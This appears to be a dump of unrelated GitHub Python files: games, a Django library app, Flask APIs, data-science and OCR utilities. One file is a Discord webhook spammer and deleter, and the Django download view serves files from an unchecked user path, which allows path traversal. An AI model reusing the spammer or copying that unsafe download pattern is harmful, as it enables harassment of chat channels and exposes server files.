cluster following direct \n # relative, we compare the x value after shift and the x value of\n # the center of their children nodes. The correct x value should \n # be the greater one. 
And we keep track of the shift distance \n # because it will affect the following siblings and clusters.\n for sibl in gnrt[dirClst[i]][dirSibl[i]+1:]:\n shift = self._compare_shiftCenter(sibl, shift)\n\n # For the nodes in the following clusters\n for clst in gnrt[dirClst[i]+1:]:\n for sibl in clst:\n shift = self._compare_shiftCenter(sibl, shift)\n\n\n def _compare_shiftCenter(self, node, shift):\n \"\"\" compare the shifted distance and the center of children cluster of\n given node, assign the larger one as the new x value of given node and \n return the shifted amount.\n \"\"\"\n center = self._find_childrenCenter(node)\n original = deepcopy(node['x'])\n shifted = original + shift\n node['x'] = max(center, shifted)\n shift = node['x'] - original\n return shift\n\n\n def _find_childrenCenter(self, node):\n \"\"\" Find the center of children cluster of gievn node if it has child-\n ren nodes.\n \"\"\"\n # if it has no children, then return a negative value\n if node['children'] == None: return -999\n # else, find the children cluster, take the average of x values of \n # this cluster's first and last nodes.\n else:\n children = self.parsedTree[node['gnrt']+1][node['children']]\n clstStartX = children[0]['x']\n clstEndX = children[-1]['x']\n return (clstStartX + clstEndX)/2\n\n\n def _normalize_tree(self):\n \"\"\" scale the x values of tree if the maximal x value of any layer \n exceed 5/6 pi. \n \"\"\"\n X = self._extract_values(self.parsedTree, 'x')\n minX, maxX = min(X), max(X)\n if maxX >= 5/6 * math.pi:\n scale = 2*math.pi / (maxX - minX + 0.05)\n for gnrt in self.parsedTree:\n for clst in gnrt:\n for sibl in clst:\n sibl['x'] *= scale\n\n\n def _flatten(self, nestedList):\n \"\"\" given a list, possibly nested to any level, return it flattened.\n \"\"\"\n flatten = []\n for item in nestedList:\n # if any element is a list, recursively apply this function.\n if type(item) == list: flatten.extend(self._flatten(item))\n else: flatten.append(item)\n return flatten\n\n\n def _isPath(self, node):\n \"\"\" check whether the given node is on the path to the goal node. To \n do this, we simply check whether this node is in the path collection.\n \"\"\"\n for pathNode in self.pathNodes: \n if node == pathNode: return True\n return False\n\n\n def _extract_values(self, nested, key):\n \"\"\" extract the values of specified key from all dictionaries in a \n nested list. We use this function to extract values of certain \n attributes of all nodes in a tree or generation.\n\n inputs:\n -------\n - nested: A nested list of dictionaries. \n - key: The key of interest.\n \"\"\"\n values = [node[key] for node in self._flatten(nested)]\n return values\n\n\n","repo_name":"Xianlai/Tree-Search-and-Visualization","sub_path":"tree_search_plot/tree_search_plot/TreeVisual.py","file_name":"TreeVisual.py","file_ext":"py","file_size_in_byte":17981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41074412315","text":"from multiprocessing import context\nfrom django.urls import reverse_lazy, reverse\nimport os\nfrom urllib import request, response\nfrom django.conf import settings\nfrom django.shortcuts import render,redirect, get_object_or_404\nfrom . models import *\nfrom . 
forms import CommentForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect, HttpResponse, JsonResponse\nfrom django.template.loader import render_to_string\n\n\n# from account import forms\n\n# Create your views here.\n\n\n\ndef libraries(request):\n    all_libraries = Post.objects.all()\n    return render(request, 'product-page.html', {'all_libraries' : all_libraries})\n\ndef library_preview(request, preview):\n    library = Post.objects.get(preview=preview)\n    return render(request, 'library_preview.html', {\"library\" : library})\n\n\n\n#library_slug(request):\n\n\ndef library_detail(request, slug):\n    library = Post.objects.get(slug=slug)\n    is_liked = False\n    if library.likes.filter(id=request.user.id).exists(): \n        is_liked = True \n    \n    if request.method == 'POST':\n        cf = CommentForm(request.POST)\n        if cf.is_valid(): \n            content = request.POST.get('content')\n            comment = Comment.objects.create(library = library, user = request.user, content = content)\n            comment.save()\n            return redirect('library_detail', slug=library.slug)\n    else: \n\n        cf = CommentForm()\n    context= { \n        'comment_form':cf, \n        'library' : library,\n        'is_liked':is_liked, \n        'total_likes': library.total_likes(),\n        \n    } \n    return render(request, 'library_detail.html', context)\n\n\ndef download(request, path):\n    file_path = os.path.join(settings.MEDIA_ROOT, path)\n    if os.path.exists(file_path):\n        with open(file_path, 'rb') as fh:\n            response = HttpResponse(fh.read(), content_type=\"application/octet-stream\")\n            response['Content-Disposition'] = 'inline; filename=' + os.path.basename(file_path)\n            return response\n    return HttpResponse(\"File not found\", status=404)\n\n\ndef like_library(request):\n    library = get_object_or_404(Post, id=request.POST.get('library_id'))\n    is_liked = False\n    if library.likes.filter(id = request.user.id).exists():\n        library.likes.remove(request.user)\n        is_liked = False\n    else:\n        library.likes.add(request.user)\n        is_liked = True\n\n    context= {\n        'is_liked':is_liked, \n        'total_likes': library.total_likes(),\n        'library' : library,\n    } \n    \n    if request.is_ajax():\n        html = render_to_string('like_section.html', context, request=request) \n        context = {'form': html} \n        return JsonResponse(context)\n\n\n\n","repo_name":"zuri-training/auth-wiki-team7","sub_path":"library/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"}
+{"seq_id":"7133964164","text":"from flask import Flask, render_template, request\nfrom flask_restful import Api, Resource, abort\nimport os\nfrom classes import DirectoryInfo, FileInformation, SettingsAllowedPaths\n\napp = Flask(__name__,\n             template_folder='.',\n             static_folder=\".\",\n             static_url_path=\"\")\n\napi = Api(app)\n\n\n@app.route('/')\ndef index():\n    return render_template('index.html')\n\n\napi.add_resource(SettingsAllowedPaths.SettingsAllowedPaths, '/settings')\napi.add_resource(DirectoryInfo.DirectoryInfo, '/directory')\napi.add_resource(FileInformation.FileInformation, '/file')\n\nif __name__ == \"__main__\":\n
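    # Serving on "localhost" keeps the API reachable only from this machine;
    # host="0.0.0.0" would expose it on the local network instead.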
    app.run(host=\"localhost\", port=\"7777\", debug=True)","repo_name":"AdamFousek/python-restapi-files","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70155178651","text":"import requests\r\nimport os\r\nfrom colorama import init, Fore\r\nfrom dhooks import *\r\nimport time\r\ncooldown_spam = 0\r\n\r\n\r\ninit(convert=True)\r\n\r\n\r\n\r\nchoices = 'Webhooks Tools\\n\\n'+ Fore.RED + '[0] ' + Fore.GREEN + 'Webhook Sender \\n' + Fore.RED + '[1] ' + Fore.GREEN + 'Webhook Deleter \\n' + Fore.RED + '[2] ' + Fore.GREEN + 'Webhook Spammer \\n' + Fore.RED + '[3] ' + Fore.GREEN + 'Webhook Renamer \\n' \r\ndef main():\r\n    os.system(\"cls\")\r\n    os.system(\"color A\")\r\n\r\n    print(choices)\r\n    print()\r\n    print()\r\n    print()\r\n    choice = input(\"Choice\" + Fore.RED + \" → \")\r\n    \r\n    if choice == '0':\r\n        os.system(\"title Webhook Sender\")\r\n        WebhookURL = input(Fore.GREEN + \"Please send the webhook\" + Fore.RED + \" →\t\")\r\n        WebhookMSG = input(Fore.GREEN + \"Please send the message\" + Fore.RED + \" →\t\") \r\n        hook = Webhook(WebhookURL)\r\n        hook.send(WebhookMSG)\r\n        os.system(\"cls\")\r\n        input(Fore.WHITE + \"Message sent successfully! Press Enter to return to the main menu.\") \r\n        main()\r\n\r\n    if choice == '1': \r\n        os.system(\"title Webhook Deleter\") \r\n        Deleter = input(Fore.GREEN + \"Please send the webhook to delete\" + Fore.RED + \" →\t\") \r\n        requests.delete(Deleter)\r\n        print(\"Webhook: \" + Fore.RED + Deleter + \" was deleted successfully!\") \r\n        os.system(\"cls\") \r\n        input(Fore.WHITE + \"Webhook deleted successfully! Press Enter to return to the main menu.\")\r\n        main()\r\n    \r\n    if choice == '2': \r\n        os.system(\"title Webhook Spammer\") \r\n        webhookURL1 = input(Fore.GREEN + \"Please send the webhook link to spam\" + Fore.RED + \" →\t\")\r\n        webhookMessage = input(Fore.GREEN + \"Please send the message to spam\" + Fore.RED + \" →\t\" )\r\n        num = int(input(Fore.GREEN + \"Please send the number of messages to spam\" + Fore.RED + \" →\t\"))\r\n        hook1 = Webhook(webhookURL1)\r\n        for i in range(num): \r\n            f = i + 1\r\n            e = f \r\n            hook1 = Webhook(webhookURL1)\r\n            hook1.send(webhookMessage)\r\n            print(f'Message: {webhookMessage} | Send count: {f}/{num}')\r\n            time.sleep(1.5)\r\n            if f == num:\r\n                input(Fore.WHITE + \"Spam completed successfully! Press Enter to return to the main menu.\")\r\n                main()\r\n    \r\n    \r\n    if choice == '3': \r\n        os.system(\"title Webhook Renamer\")\r\n        webhookURL2 = input(Fore.GREEN + \"Please send the webhook link to rename\" + Fore.RED + \" →\t\")\r\n        webhookName = input(Fore.GREEN + \"Please send the new webhook name\" + Fore.RED + \" →\t\" )\r\n        r = requests.patch(webhookURL2, json={ \"name\":webhookName })\r\n        input(Fore.WHITE + 'The webhook was renamed successfully! Press Enter to return to the main menu.')\r\n        main()\r\n\r\n\r\nmain()\r\n\r\n","repo_name":"Azulix/VCH-Webhook","sub_path":"VCH-Webhook.py","file_name":"VCH-Webhook.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"6997586463","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 27 14:24:21 2020\n\n@author: IssaCamara\n\"\"\"\nimport numpy as np\nimport pandas as pd\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\n\ndef vectorize(X_train, X_val, y_train, y_val, tokenizer, max_length):\n\n    X_train_vect = tokenizer.texts_to_sequences(X_train)\n    X_val_vect = tokenizer.texts_to_sequences(X_val)\n    \n    X_train_vect = pad_sequences(X_train_vect, max_length)\n    X_val_vect = pad_sequences(X_val_vect, max_length)\n    return (X_train_vect, X_val_vect)\n    \n\n\n\n\ndef predict_sentiment(text, model, tokenizer, max_length):\n    text_vect = tokenizer.texts_to_sequences(pd.Series(text))\n    \n    text_vect = pad_sequences(text_vect, max_length)\n    \n    y_pred = model.predict_classes(text_vect)\n    \n    return y_pred\n\n\ndef predict_proba(text, model, tokenizer, max_length):\n\n    text_vect = tokenizer.texts_to_sequences(pd.Series(text))\n    \n    text_vect = pad_sequences(text_vect, max_length)\n    \n    proba = model.predict(text_vect)\n    \n    return proba\n","repo_name":"issacamara/SentimentAnalysis","sub_path":"flaskr/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29915813397","text":"\ndef is_astonishing(num):\n    res, n = \"\", str(num)\n    for i in range(1, len(n)):\n        a,b = int(n[:i]), int(n[i:])\n        (a,b), res = (sorted([a,b]), \"BA\") if a>b else ((a,b), \"AB\")\n        if (b-a+1)*(a+b)/2 == num:\n            return \"{}-Astonishing\".format(res)\n    return False\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"76pRYoqrmEQQtFAME_23.py","file_name":"76pRYoqrmEQQtFAME_23.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"5961576000","text":"\"\"\"\nCustom Seating Cards\n\nChapter 15 included a practice project to create custom invitations from\na list of guests in a word document. As an additional project, use the\npillow module to create images for custom seating cards for your guests.\n\nFor each of the guests listed in the guests.txt file, generate an image\nfile with the guest name and some flowery decoration. 
A public domain\nflower image is also available.\n\nTo ensure that each seating card is the same size, add a black rectangle\non the edges of the invitation image so that when the image is printed\nout, there will be a guideline for cutting.\n\nThe PNG files that Pillow produces are set to 72 pixels per inch, so a\n4×5-inch card would require a 288×360-pixel image.\n\"\"\"\n\nimport os\nfrom PIL import Image, ImageDraw, ImageFont\n\nFRAME_FILE = 'frame.png'\nGUESTS_FILE = 'guests.txt'\n\ndef get_guest_list(filename):\n    \"\"\"Returns a justified list with all the names in 'filename'\"\"\"\n    with open(filename) as file_obj:\n        guests = file_obj.read().split('\\n')\n    return center_names(guests)\n\ndef center_names(names_list):\n    \"\"\"Returns a list with the names on 'names_list' center justified\"\"\"\n    centered_names = []\n    len_names = [len(name) for name in names_list]\n    max_len = max(len_names)\n    for name in names_list:\n        centered_names.append(name.center(max_len))\n    return centered_names\n\ndef draw_rectangle(image_obj):\n    \"\"\"Draws a black guideline for cutting the card.\"\"\"\n    draw = ImageDraw.Draw(image_obj)\n    draw.rectangle((5, 5, 365, 293), outline='black')\n\ndef add_frame(image_obj):\n    \"\"\"Adds a flowery frame to the card.\"\"\"\n    frame = Image.open(FRAME_FILE)\n    image_obj.paste(frame, (9, 9), frame)\n\ndef draw_guest_name(image_obj, guest_name):\n    \"\"\"Draws the guest name\"\"\"\n    draw = ImageDraw.Draw(image_obj)\n    font_folder = '/usr/share/fonts/urw-base35/'\n    font_name = 'Z003-MediumItalic.otf' #afm otf t1\n    font = ImageFont.truetype(\n        os.path.join(font_folder, font_name), 54)\n    draw.text((60, 130), guest_name, fill='black', font=font)\n\ndef create_card(guest_name):\n    \"\"\"Creates a seating card.\"\"\"\n    img = Image.new('RGBA', (370, 298), 'white')\n    draw_rectangle(img)\n    add_frame(img)\n    draw_guest_name(img, guest_name)\n    img.save(f'{guest_name.strip()}.png')\n\n# Create guest list\nguest_list = get_guest_list(GUESTS_FILE)\n# Create a custom card for each guest in list\nfor guest in guest_list:\n    create_card(guest)\n","repo_name":"xerifeazeitona/autbor","sub_path":"chapter19/projects/custom_seating_cards/custom_seating_cards.py","file_name":"custom_seating_cards.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"438616034","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.stats import binom\nfrom matplotlib import rcParams\n\n\n\"\"\"----Constants----\"\"\"\nn = 200\np = 0.1\n\n\"\"\"----Config----\"\"\"\nrcParams.update({'font.size': 11, 'interactive': False})\nWORLD = True\nSEED = True\n\n\ndef main():\n    number_of_chunks = np.arange(200, dtype=int)\n    world_probability = binom.pmf(number_of_chunks, n, p) * ((29999984 * (2/16)) ** 2)\n    world_probability = np.append(world_probability, [(1 / 10) ** 200 * (29999984 * (2 / 16)) ** 2])\n    number_of_chunks = np.append(number_of_chunks, [200])\n    data_world = np.array([number_of_chunks, world_probability]).T\n    np.savetxt('world_probability.txt', data_world, fmt=['%d', '%e'])\n\n    if WORLD:\n        print('---World---')\n        print('n', 'P(x)')\n        for i, j in data_world:\n            print(int(i), j)\n\n        plt.plot(number_of_chunks, world_probability)\n        plt.yscale('log')\n        plt.title('amount of slime chunks clusters per amount of slime chunks \\n on avg in a given world')\n        plt.xlabel('number of chunks in cluster'), plt.ylabel('amount on avg in world')\n        plt.savefig('slime_clusters.png')\n        plt.show()\n\n    if SEED:\n        number_of_seeds = 18446744073709551616\n        
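        # 18446744073709551616 == 2**64, i.e. one expectation per possible
        # 64-bit world seed; multiplying scales the per-world average to all seeds.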
seed_probability = world_probability * number_of_seeds\n data_seed = np.array([number_of_chunks, seed_probability]).T\n np.savetxt('seed_probability.txt', data_seed, fmt=['%d', '%e'])\n\n print('---Seed---')\n print('n', 'P(x)')\n for i, j in data_seed:\n print(int(i), j)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"viktor40/SlimeChunkClusterStats","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20933884567","text":"#AUTHOR: Smayan Nirantare\n\nfrom PyQt5 import QtCore\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nimport sys, random, time\n\nclass MainWindow(QWidget):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.setWindowTitle(\"Snake Game\")\n self.setGeometry(100, 100, COLS * CELL_SIZE, ROWS * CELL_SIZE + RELIEF)\n\n self.cells = [[QLabel(self) for i in range(COLS)] for j in range(ROWS)]\n\n loop = QTimer(self)\n loop.timeout.connect(self.mainLoop)\n loop.start(80)\n\n self.dirx = 0\n self.diry = 0\n self.row = 5\n self.col = 5\n\n self.snake_body = []\n self.pre_body = []\n self.snake_length = 1\n\n self.cells[self.row][self.col].setStyleSheet(\"border: 1px solid black; background-color: green\")\n self.food_row, self.food_col = self.getFoodPos()\n\n self.score_lbl = QLabel(self)\n self.score_lbl.setFont(FONT1)\n self.score_lbl.setGeometry(10, 0, 500, RELIEF)\n\n self.createGrid()\n\n def createGrid(self):\n x = 0\n y = RELIEF\n\n for row in range(ROWS):\n for col in range(COLS):\n cell = self.cells[row][col]\n \n #alligns text in label to the center\n cell.setAlignment(QtCore.Qt.AlignCenter)\n cell.setFont(FONT1)\n\n #determines placement and size of label\n cell.setGeometry(x, y, CELL_SIZE, CELL_SIZE)\n x += CELL_SIZE\n\n cell.setStyleSheet(\"border: 1px solid black; background-color: white\")\n x = 0\n y += CELL_SIZE\n\n \n def mainLoop(self):\n self.score_lbl.setText(\"Score: \" + str(self.snake_length))\n self.move()\n\n def move(self):\n self.row += self.diry\n self.col += self.dirx\n\n if self.col == -1:\n self.col = COLS - 1\n if self.row == -1:\n self.row = ROWS - 1\n if self.col == COLS:\n self.col = 0\n if self.row == ROWS:\n self.row = 0\n\n self.handleLength()\n\n color = LIGHT_GREEN\n for i, segment in enumerate(self.snake_body):\n if i == len(self.snake_body) - 1: color = GREEN\n\n self.cells[segment[0]][segment[1]].setStyleSheet(\"border: 1px solid black; background-color: \" + color) \n\n\n for row in range(ROWS):\n for col in range(COLS):\n if [row, col] not in self.snake_body:\n self.cells[row][col].setStyleSheet(\"border: 1px solid black; background-color: white\")\n \n \n self.cells[self.food_row][self.food_col].setStyleSheet(\"border: 1px solid black; background-color: red\")\n\n def handleLength(self):\n\n snake_head = []\n snake_head.append(self.row)\n snake_head.append(self.col)\n self.snake_body.append(snake_head)\n if len(self.snake_body) > self.snake_length:\n self.snake_body.pop(0)\n\n if self.snake_body[-1] in self.snake_body[:-1]:\n self.reset()\n\n if self.row == self.food_row and self.col == self.food_col:\n self.snake_length += 1\n self.food_row, self.food_col = self.getFoodPos()\n\n def getFoodPos(self):\n food_col = random.randint(0, COLS - 1) \n food_row = random.randint(0, ROWS - 1)\n \n return food_row, food_col\n\n def reset(self):\n time.sleep(1)\n self.dirx = 0\n self.diry = 0\n self.snake_length = 1\n 
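        # Forget every stored segment so the respawned snake starts over as a
        # single cell; its position and the food are re-seeded just below.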
self.snake_body.clear()\n\n self.row = 5\n self.col = 5\n\n self.food_row, self.food_col = self.getFoodPos()\n\n def keyPressEvent(self, event):\n if event.key() == QtCore.Qt.Key_Down and self.diry != -1:\n self.diry = 1\n self.dirx = 0\n elif event.key() == QtCore.Qt.Key_Up and self.diry != 1:\n self.diry = -1\n self.dirx = 0\n elif event.key() == QtCore.Qt.Key_Left and self.dirx != 1:\n self.dirx = -1\n self.diry = 0\n elif event.key() == QtCore.Qt.Key_Right and self.dirx != -1:\n self.dirx = 1\n self.diry = 0\n\n\ndef main():\n app = QApplication(sys.argv)\n window = MainWindow()\n window.show()\n app.exec_()\n\n\nROWS = 15\nCOLS = 15\nCELL_SIZE = 75\nRELIEF = 100\n\nFONT1 = QFont(\"Arial\", 20)\n\nRED = \"rgb(255, 0, 0)\"\nGREEN = \"rgb(0, 180, 0)\"\nLIGHT_GREEN = \"rgb(0, 255, 0)\"\nBLUE = \"rgb(0, 0, 255)\"\n\n\nif __name__ == '__main__':\n main()","repo_name":"Smayan-n/Snake-Game","sub_path":"Version2/snake_gameV2.py","file_name":"snake_gameV2.py","file_ext":"py","file_size_in_byte":4510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72252724891","text":"import numpy as np\nfrom matplotlib import colors, cm, pyplot as plt\nfrom eventio import SimTelFile\nfrom ctapipe.io import SimTelEventSource\nfrom ctapipe.visualization import CameraDisplay\n\nbad_pixels = {'color': 'black', 'alpha': 0.1}\ncw = cm.coolwarm\ncw.set_bad(**bad_pixels)\nvi = cm.viridis\nvi.set_bad(**bad_pixels)\n\np = \"build/simtel-output.zst\"\nf = SimTelFile(p)\ns = SimTelEventSource(p)\n\ngeom = s.subarray.tel[1].camera.geometry\n\nfig, (ax_im, ax_t) = plt.subplots(ncols=2, figsize=(8, 4))\n\ndisp_im = CameraDisplay(geom, ax=ax_im, cmap=vi)\ndisp_im.add_colorbar()\ndisp_t = CameraDisplay(geom, ax=ax_t, cmap=cw)\ndisp_t.add_colorbar()\n\nfig.tight_layout()\nfig.show()\n\n\ndef plot(pe):\n image = pe['photoelectrons']\n image[image == 0] = np.nan\n\n time = np.empty_like(image)\n mask = pe['pixel_id']\n time[:] = np.nan\n time[mask] = pe['time'] - np.mean(pe['time'])\n\n disp_im.image = image\n disp_t.image = time\n\n\nfor event in f.iter_mc_events():\n if event['photoelectrons'] != {}:\n pe = event['photoelectrons'][0]\n\n if np.sum(pe['photoelectrons']) > 100:\n plot(pe)\n plt.pause(0.2)\n","repo_name":"fact-project/sim_telarray_configuration","sub_path":"scripts/plot_event.py","file_name":"plot_event.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9600034938","text":"from flask import Flask, request\r\nfrom flask import jsonify\r\nimport json\r\nimport tg_logic_main\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/hello')\r\ndef hello():\r\n return jsonify(content=\"OK\")\r\n\r\n@app.route('/bot', methods=['POST'])\r\ndef bot():\r\n data = json.loads(request.get_data(as_text=True))\r\n res = tg_logic_main.flask_handler(data)\r\n return str(res)\r\n\r\nif __name__ == \"__main__\": \r\n app.run(port=5002)","repo_name":"kiands/ChatbotWithGraphDB","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26298949689","text":"from datetime import date\n\n\ndef create_client_insurance_default():\n client_insurance = {\n \"auto\": [\n {\"key\": 1, \"value\": \"regular\"}\n ],\n \"disability\": \"ineligible\",\n \"home\": [\n {\"key\": 1, \"value\": \"economic\"},\n {\"key\": 2, \"value\": \"regular\"}\n ],\n \"life\": 
\"regular\",\n \"umbrella\": \"regular\"\n }\n return client_insurance\n\n\ndef create_client_info_default():\n client_info = {\n \"age\": 35,\n \"dependents\": 1,\n \"houses\": [\n {\"key\": 1, \"ownership_status\": \"owned\"},\n {\"key\": 2, \"ownership_status\": \"mortgaged\"}\n ],\n \"income\": 0,\n \"marital_status\": \"married\",\n \"risk_questions\": [0, 1, 0],\n \"vehicles\": [\n {\"key\": 1, \"year\": int(date.today().strftime(\"%Y\")) - 1}\n ]\n }\n return client_info\n\n\ndef create_client_info_ineligible():\n client_info = {\n \"age\": 90,\n \"dependents\": 0,\n \"houses\": [],\n \"income\": 0,\n \"marital_status\": \"single\",\n \"risk_questions\": [0, 0, 0],\n \"vehicles\": []\n }\n return client_info\n\n\ndef create_client_info_economic():\n client_info = {\n \"age\": 35,\n \"dependents\": 0,\n \"houses\": [\n {\"key\": 1, \"ownership_status\": \"owned\"}\n ],\n \"income\": 1,\n \"marital_status\": \"married\",\n \"risk_questions\": [0, 0, 0],\n \"vehicles\": [\n {\"key\": 1, \"year\": 1900}\n ]\n }\n return client_info\n\n\ndef create_client_info_regular():\n client_info = {\n \"age\": 50,\n \"dependents\": 1,\n \"houses\": [\n {\"key\": 1, \"ownership_status\": \"owned\"}\n ],\n \"income\": 1,\n \"marital_status\": \"single\",\n \"risk_questions\": [0, 1, 0],\n \"vehicles\": [\n {\"key\": 1, \"year\": 1900}\n ]\n }\n return client_info\n\n\ndef create_client_info_responsible():\n client_info = {\n \"age\": 50,\n \"dependents\": 1,\n \"houses\": [\n {\"key\": 1, \"ownership_status\": \"mortgaged\"}\n ],\n \"income\": 1,\n \"marital_status\": \"married\",\n \"risk_questions\": [1, 1, 1],\n \"vehicles\": [\n {\"key\": 1, \"year\": int(date.today().strftime(\"%Y\"))}\n ]\n }\n return client_info\n\n\ndef create_client_insurance_ineligible():\n client_insurance = {\n \"auto\": \"ineligible\",\n \"disability\": \"ineligible\",\n \"home\": \"ineligible\",\n \"life\": \"ineligible\",\n \"umbrella\": \"ineligible\"\n }\n return client_insurance\n","repo_name":"leodecavalcante/origin-financial","sub_path":"tests/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10866285277","text":"import pygame\nimport config_screens\nfrom element_button import Button\n\nclass GameOver():\n\tdef __init__(self):\n\t\tself.restart_button = Button(25, 520, 300, 60, \"Play Again\")\n\t\tself.choose_level = Button(475, 520, 300, 60, \"Choose Level\")\n\n\tdef set(self, level):\n\t\tself.level = level\n\t\tif (pygame.display.Info().current_w != 800 or pygame.display.Info().current_h != 600):\n\t\t\tconfig_screens.set((800, 600))\n\t\tpygame.display.set_caption(\"Gave Over\")\n\t\tself.bg_image = pygame.image.load(\"img/bg/game-over-bg.png\")\n\t\n\tdef run(self):\n\t\twhile (True):\n\t\t\tconfig_screens.screen.blit(self.bg_image, (0, 0))\n\n\t\t\tself.restart_button.draw(config_screens.screen)\n\t\t\tself.choose_level.draw(config_screens.screen)\n\t\t\t\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tpos = pygame.mouse.get_pos()\n\n\t\t\t\tif (event.type == pygame.QUIT):\n\t\t\t\t\tpygame.quit()\n\t\t\t\t\texit(0)\n\n\t\t\t\tif (event.type == pygame.MOUSEBUTTONDOWN):\n\t\t\t\t\tif self.restart_button.isOver(pos):\n\t\t\t\t\t\tconfig_screens.game_start.set(self.level)\n\t\t\t\t\t\tconfig_screens.game_start.run()\n\t\t\t\t\telif self.choose_level.isOver(pos):\n\t\t\t\t\t\tconfig_screens.choose_level.set(\"Choose 
Level\")\n\t\t\t\t\t\tconfig_screens.choose_level.run()\n\n\t\t\t\tif (event.type == pygame.MOUSEMOTION):\n\t\t\t\t\tself.restart_button.color = (20, 108, 148) if self.restart_button.isOver(pos) else (25, 167, 206)\n\t\t\t\t\tself.choose_level.color = (20, 108, 148) if self.choose_level.isOver(pos) else (25, 167, 206)\n\n\t\t\ttext = config_screens.font.render(\"Good Luck Next Time\", True, (20, 108, 148))\n\t\t\tconfig_screens.screen.blit(text, ((800 - text.get_width())//2, 250))\n\t\t\t\t\t\t\n\t\t\tpygame.display.update()\n\n\t\t\tconfig_screens.clock.tick(config_screens.fps)","repo_name":"NursultanAkhmetov/MineSweeper","sub_path":"screen_game_over.py","file_name":"screen_game_over.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26015665784","text":"# -*- coding: UTF-8 -*-\n\nimport time\nimport uuid\nimport base64\nimport urllib.parse\nimport hashlib\nimport requests\nfrom gl import Global\n\n\ndef get_file_content(file_path):\n with open(file_path, \"rb\") as fp:\n return fp.read()\n\n\ndef get_exp_account():\n url = Global.config.get_value(\"experience_account_url\")\n t = int(time.time())\n data = dict({\n \"token\": hashlib.md5(str(t).encode(\"utf-8\")).hexdigest().upper(),\n \"timestamp\": t\n })\n try:\n response = post_request(url, None, data).json()\n\n if response[\"status\"] == 0:\n return True, response[\"app_id\"], response[\"app_key\"]\n return False, None, None\n except:\n Global.gui.show_message_box(\"错误\", \"获取共享API过程中出现网络错误!\\n请检查网络连接后重试\")\n return False, None, None\n\n\ndef post_request(url, params, data):\n return requests.post(url, params=params, data=data)\n\n\nclass BdOcr:\n def __init__(self):\n self.api_key = Global.config.get_value(\"bd_api_key\")\n self.secret_key = Global.config.get_value(\"bd_secret_key\")\n self.token = None\n self.api_list = {\n \"general_basic\": self.__general_basic,\n \"general\": self.__general,\n \"accurate_basic\": self.__accurate_basic,\n \"accurate\": self.__accurate,\n \"web_image\": self.__web_image,\n }\n self.api_url_list = {\n \"token\": Global.config.get_value(\"bd_access_token_url\"),\n \"general_basic\": Global.config.get_value(\"bd_general_basic_url\"),\n \"general\": Global.config.get_value(\"bd_general_url\"),\n \"accurate_basic\": Global.config.get_value(\"bd_accurate_basic_url\"),\n \"accurate\": Global.config.get_value(\"bd_accurate_url\"),\n \"web_image\": Global.config.get_value(\"bd_web_image_url\")\n }\n\n def __del__(self):\n print(\"BdOcr has been destroyed.\")\n\n def get_token(self):\n params = {\n \"grant_type\": \"client_credentials\",\n \"client_id\": self.api_key,\n \"client_secret\": self.secret_key\n }\n response = requests.post(url=self.api_url_list[\"token\"], data=params).json()\n\n if isinstance(response.get(\"error\", -1), int):\n self.token = response[\"access_token\"]\n return True\n\n return False\n\n def __general_basic(self, kwargs):\n image2base64 = base64.b64encode(get_file_content(kwargs[\"image\"]))\n ocr_url = self.api_url_list[\"general_basic\"]\n params = {\n \"access_token\": self.token\n }\n data = {\n \"image\": image2base64,\n \"language_type\": kwargs[\"lang\"],\n \"probability\": \"true\"\n }\n\n return post_request(ocr_url, params, data).json()\n\n def __general(self, kwargs):\n image2base64 = base64.b64encode(get_file_content(kwargs[\"image\"]))\n ocr_url = self.api_url_list[\"general\"]\n params = {\n \"access_token\": self.token\n }\n data = {\n \"image\": 
